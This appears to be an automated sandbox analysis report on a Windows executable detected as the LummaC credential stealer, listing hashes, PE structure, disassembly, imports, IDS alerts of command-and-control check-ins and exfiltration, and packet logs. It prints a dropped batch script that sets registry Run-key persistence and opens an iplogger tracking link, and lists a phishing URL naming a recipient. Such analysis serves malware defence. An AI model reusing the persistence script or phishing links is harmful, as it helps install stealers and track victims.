                                                                                                                                      https://clienti.documentipostali.it/#/public/email/a703266c-62aa-4024-8f0c-254725c31c25-DD0015830773-D0002973415Get hashmaliciousUnknownBrowse
                                                                                                                                      • 104.17.25.14
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                      • 172.67.165.166
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      https://economiesocialeestrie-my.sharepoint.com/:f:/g/personal/cynthia_economiesocialeestrie_ca/Eg3bU_gVnldCmtzlGs9oSUQBYKQRNnAURt93MlkOZFbwAg?email=gaston.stratford%40assnat.qc.ca&e=iSpthp&xsdata=MDV8MDJ8R2FzdG9uLlN0cmF0Zm9yZEBhc3NuYXQucWMuY2F8Y2RjYmI0YjE1ZGI0NGZhNmQzYjUwOGRkMTA4MmQxNTh8MWE1NjE5ODBkNjc0NGQzMGEyOTc1ODhjMDdhODMzNTN8MHwwfDYzODY4NDg3NjU1MjMyNTA1OHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SkZiWEIwZVUxaGNHa2lPblJ5ZFdVc0lsWWlPaUl3TGpBdU1EQXdNQ0lzSWxBaU9pSlhhVzR6TWlJc0lrRk9Jam9pVFdGcGJDSXNJbGRVSWpveWZRPT18MHx8fA%3d%3d&sdata=YVp6WGNQM0psVGw2TU5teXRVbmhhMy9VaDRhYW5SeWdTN0pDaTBKV2p2Yz0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 1.1.1.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                      No context
                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1928704
                                                                                                                                      Entropy (8bit):7.950017394374122
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:9gQrhDDlpKUtMd2L+1uyewdTV7wHUrzl:7rhD+tP1uyewtVUol
                                                                                                                                      MD5:B0D5568D499D1DFA75064E85E9FB3EAC
                                                                                                                                      SHA1:B6297B622C70955E56BB209F221D96BA7B9ECB11
                                                                                                                                      SHA-256:27E0A780B1461B79A366E320872C9F937532881168FF70864AFA733D63C502D5
                                                                                                                                      SHA-512:721ABFDBEC39BA2C4959426F50293DBFF2F80750AB6DD37CE4B6C86AAA781EF69622D126C67579A9DC4D913B7284C40AEFBE913892D8F4526808C2F48957D5D7
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...L0Gg.............................`L...........@...........................L..........@.................................\@..p....0.......................A...................................................................................... . . .......J..................@....rsrc........0.......Z..............@....idata .....@.......\..............@... ..,..P.......^..............@...fngpdisv.....`1......`..............@...tvvnknfw.....PL......F..............@....taggant.0...`L.."...L..............@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347
                                                                                                                                      Entropy (8bit):5.241342430352341
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:hwszH1j0KpIAgidquHxEDscfoZH1j0KpIAgidquHxEDsWEEDwTGQCCAP+YOA:HVj0KprgidquS+Vj0KprgidquqSqXCQ9
                                                                                                                                      MD5:C27142AA5D9C13E25E9335A57A952743
                                                                                                                                      SHA1:725EED87891582F0D5BC1622F5A84CB5B77E2495
                                                                                                                                      SHA-256:C5A6FC64F2EBF5C1FD0E39E4AE37D53FEA01A6758A74B1544D2D475A97DD09AD
                                                                                                                                      SHA-512:43FC9B010ED3CD9F7ADD8E774613492355E41D08FD9E2790AFD0CF9ED08133BE74BDC543C5D6820CE4B68898D07407EC5CF090DBD75180255A4763A3C730BE42
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\dileapp.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\dileapp.exe"..start %Public%\Netstat\dileapp.exe..@echo off..start "" "https://iplogger.co/1tJFB4"..exit..
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):2833
                                                                                                                                      Entropy (8bit):7.876846206921263
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                                      MD5:18C023BC439B446F91BF942270882422
                                                                                                                                      SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                                      SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                                                      SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://iplogger.co/favicon.ico
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2833
                                                                                                                                      Entropy (8bit):7.876846206921263
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                                      MD5:18C023BC439B446F91BF942270882422
                                                                                                                                      SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                                      SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                                                      SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                                      Malicious:false
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.943466786411873
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:file.exe
                                                                                                                                      File size:2'210'104 bytes
                                                                                                                                      MD5:eff5fbe427181fe1a3eed978cf0c9a36
                                                                                                                                      SHA1:ddc48ac8b408c35b8bae9caf0b6c69df56a7c3e3
                                                                                                                                      SHA256:7119f52e94061723532085e4a082e0cb8bd3a6788b729fa41730571d77924c4d
                                                                                                                                      SHA512:b515848a86978d7b6ffeda2d5c8c057d76ce18e6ac34c88b24bd02c2495a72839c3487d480d83511e24f266224e36e1c8a039ba890399ed6c9afc811099191a3
                                                                                                                                      SSDEEP:49152:VIflOUNzXT+SitPBehfQcSm6PPc8V4/s4dEDS:VImVoQ66PU8V4/V
                                                                                                                                      TLSH:FBA52300B9C698B3E2311D315919BBA175BC7F202F10AABFB3D45E9EC63C1A17235963
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......
                                                                                                                                      Icon Hash:1515d4d4442f2d2d
                                                                                                                                      Entrypoint:0x41d779
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:5
                                                                                                                                      OS Version Minor:1
                                                                                                                                      File Version Major:5
                                                                                                                                      File Version Minor:1
                                                                                                                                      Subsystem Version Major:5
                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                      Import Hash:00be6e6c4f9e287672c8301b72bdabf3
                                                                                                                                      Instruction
                                                                                                                                      call 00007FCCB0B303CFh
                                                                                                                                      jmp 00007FCCB0B2FDC3h
                                                                                                                                      cmp ecx, dword ptr [0043A1C8h]
                                                                                                                                      jne 00007FCCB0B2FF35h
                                                                                                                                      ret
                                                                                                                                      jmp 00007FCCB0B30546h
                                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                                      mov eax, ecx
                                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                                      mov dword ptr [ecx+04h], 00430FE8h
                                                                                                                                      mov dword ptr [ecx], 00431994h
                                                                                                                                      ret
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      push esi
                                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                                      mov esi, ecx
                                                                                                                                      call 00007FCCB0B234CDh
                                                                                                                                      mov dword ptr [esi], 004319A0h
                                                                                                                                      mov eax, esi
                                                                                                                                      pop esi
                                                                                                                                      pop ebp
                                                                                                                                      retn 0004h
                                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                                      mov eax, ecx
                                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                                      mov dword ptr [ecx+04h], 004319A8h
                                                                                                                                      mov dword ptr [ecx], 004319A0h
                                                                                                                                      ret
                                                                                                                                      lea eax, dword ptr [ecx+04h]
                                                                                                                                      mov dword ptr [ecx], 00431988h
                                                                                                                                      push eax
                                                                                                                                      call 00007FCCB0B330DEh
                                                                                                                                      pop ecx
                                                                                                                                      ret
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      push esi
                                                                                                                                      mov esi, ecx
                                                                                                                                      lea eax, dword ptr [esi+04h]
                                                                                                                                      mov dword ptr [esi], 00431988h
                                                                                                                                      push eax
                                                                                                                                      call 00007FCCB0B330C7h
                                                                                                                                      test byte ptr [ebp+08h], 00000001h
                                                                                                                                      pop ecx
                                                                                                                                      je 00007FCCB0B2FF3Ch
                                                                                                                                      push 0000000Ch
                                                                                                                                      push esi
                                                                                                                                      call 00007FCCB0B2F502h
                                                                                                                                      pop ecx
                                                                                                                                      pop ecx
                                                                                                                                      mov eax, esi
                                                                                                                                      pop esi
                                                                                                                                      pop ebp
                                                                                                                                      retn 0004h
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      sub esp, 0Ch
                                                                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                      call 00007FCCB0B2FE9Eh
                                                                                                                                      push 00437B58h
                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                      push eax
                                                                                                                                      call 00007FCCB0B327C6h
                                                                                                                                      int3
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      sub esp, 0Ch
                                                                                                                                      Programming Language:
                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                      • [C++] VS2015 UPD3.1 build 24215
                                                                                                                                      • [EXP] VS2015 UPD3.1 build 24215
                                                                                                                                      • [RES] VS2015 UPD3 build 24213
                                                                                                                                      • [LNK] VS2015 UPD3.1 build 24215
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x38cd0 | 0x34 | .rdata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x38d04 | 0x3c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5d000 | 0xe034 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0x1fd0 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x36ee0 | 0x54 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x31928 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x30000 | 0x25c | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x38254 | 0x120 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| .text | 0x1000 | 0x2e864 | 0x2ea00 | 8c2dd3ebce78edeed565107466ae1d3e | False | 0.5908595844504021 | data | 6.693477406609911 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x30000 | 0x9aac | 0x9c00 | b8d3a709e8e2861298e51f270be0f883 | False | 0.45718149038461536 | data | 5.133828516884417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x3a000 | 0x213d0 | 0xc00 | 7a066b052b7178cd1388c71d17dec570 | False | 0.2789713541666667 | data | 3.2428863859698565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .gfids | 0x5c000 | 0xe8 | 0x200 | 0a8129f1f5d2e8ddcb61343ecd6f891a | False | 0.33984375 | data | 2.0959167744603624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x5d000 | 0xe034 | 0xe200 | d62594e063ef25acc085c21831d77a75 | False | 0.6341779590707964 | data | 6.802287495720703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x6c000 | 0x1fd0 | 0x2000 | 983e78af74da826d9233ebaa3055869a | False | 0.8060302734375 | data | 6.687357530503152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| PNG | 0x5d644 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | | | 1.0027729636048528 |
| PNG | 0x5e18c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | | | 0.9363390441839495 |
| RT_ICON | 0x5f738 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | | | 0.47832369942196534 |
| RT_ICON | 0x5fca0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | | | 0.5410649819494585 |
| RT_ICON | 0x60548 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | | | 0.4933368869936034 |
| RT_ICON | 0x613f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | | | 0.5390070921985816 |
| RT_ICON | 0x61858 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | | | 0.41393058161350843 |
| RT_ICON | 0x62900 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | | | 0.3479253112033195 |
| RT_ICON | 0x64ea8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9809269502193401 |
| RT_DIALOG | 0x68c1c | 0x2a2 | data | | | 0.5296735905044511 |
| RT_DIALOG | 0x68ec0 | 0x13a | data | | | 0.6624203821656051 |
| RT_DIALOG | 0x68ffc | 0xf2 | data | | | 0.71900826446281 |
| RT_DIALOG | 0x690f0 | 0x14e | data | | | 0.5868263473053892 |
| RT_DIALOG | 0x69240 | 0x318 | data | | | 0.476010101010101 |
| RT_DIALOG | 0x69558 | 0x24a | data | | | 0.6262798634812287 |
| RT_STRING | 0x697a4 | 0x1fc | data | | | 0.421259842519685 |
| RT_STRING | 0x699a0 | 0x246 | data | | | 0.41924398625429554 |
| RT_STRING | 0x69be8 | 0x1dc | data | | | 0.5105042016806722 |
| RT_STRING | 0x69dc4 | 0xdc | data | | | 0.65 |
| RT_STRING | 0x69ea0 | 0x468 | data | | | 0.375 |
| RT_STRING | 0x6a308 | 0x164 | data | | | 0.5056179775280899 |
| RT_STRING | 0x6a46c | 0xe4 | data | | | 0.6359649122807017 |
| RT_STRING | 0x6a550 | 0x158 | data | | | 0.4563953488372093 |
| RT_STRING | 0x6a6a8 | 0xe8 | data | | | 0.5948275862068966 |
| RT_STRING | 0x6a790 | 0xe6 | data | | | 0.5695652173913044 |
| RT_GROUP_ICON | 0x6a878 | 0x68 | data | | | 0.7019230769230769 |
| RT_MANIFEST | 0x6a8e0 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.3957333333333333 |
| DLL | Import |
| KERNEL32.dll | GetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer |
| gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-29T23:10:03.083696+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:04.141303+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49738 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:04.141303+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49738 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:05.381097+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:09.326265+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49746 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:10.160791+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49746 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:10.160791+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49746 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:11.518319+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49747 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:12.322134+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49747 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:12.322134+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49747 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:13.998058+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:16.465151+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:17.434629+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49750 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:17.717727+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49751 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:18.836476+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49751 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:18.836476+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49751 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:18.955180+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49753 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:20.340625+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49756 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:21.162974+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49756 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:21.162974+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49756 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:21.578273+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49757 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:22.885391+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49759 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:24.063993+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49760 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:25.392585+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49762 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:25.928587+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49763 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:26.805193+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49763 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:26.805193+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49763 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:27.399011+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49764 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:28.118931+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49766 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:28.156076+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49765 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:28.257495+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49764 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:28.798831+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49766 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:28.798831+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49766 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:30.938533+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49767 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:31.156343+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49768 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:33.638020+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49770 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:33.778394+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49771 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:36.148117+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49772 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:36.424088+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49773 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:39.127476+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49774 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:41.685041+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49775 | 172.67.156.217 | 443 | TCP
2024-11-29T23:10:44.581063+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49776 | 172.67.156.217 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                      Nov 29, 2024 23:10:06.120600939 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.120610952 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.120651960 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.162106991 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.162158012 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.162389994 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.162401915 CET44349744104.21.82.93192.168.2.4
